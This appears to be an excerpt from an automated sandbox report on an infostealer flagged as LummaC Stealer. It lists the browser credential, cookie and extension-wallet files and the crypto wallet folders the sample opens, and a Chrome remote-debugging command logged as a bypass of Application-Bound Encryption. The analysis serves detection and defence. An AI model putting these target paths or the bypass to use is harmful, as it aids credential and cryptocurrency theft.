                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: c6e8248d4e.exeBinary or memory string: WIN_81
                      Source: c6e8248d4e.exeBinary or memory string: WIN_XP
                      Source: c6e8248d4e.exe, 00000022.00000002.2110937860.00000000009C2000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                      Source: c6e8248d4e.exeBinary or memory string: WIN_XPe
                      Source: c6e8248d4e.exeBinary or memory string: WIN_VISTA
                      Source: c6e8248d4e.exeBinary or memory string: WIN_7
                      Source: c6e8248d4e.exeBinary or memory string: WIN_8
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                      Source: Yara matchFile source: 0000001E.00000003.1861959536.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.1861451133.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.1832508567.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2114874783.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 19be97887a.exe PID: 6576, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 19be97887a.exe PID: 1496, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Attempt to bypass Chrome Application-Bound Encryption
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
                      Yara detected Credential Flusher
                      Source: Yara matchFile source: Process Memory Space: c6e8248d4e.exe PID: 6080, type: MEMORYSTR
                      Yara detected LummaC Stealer
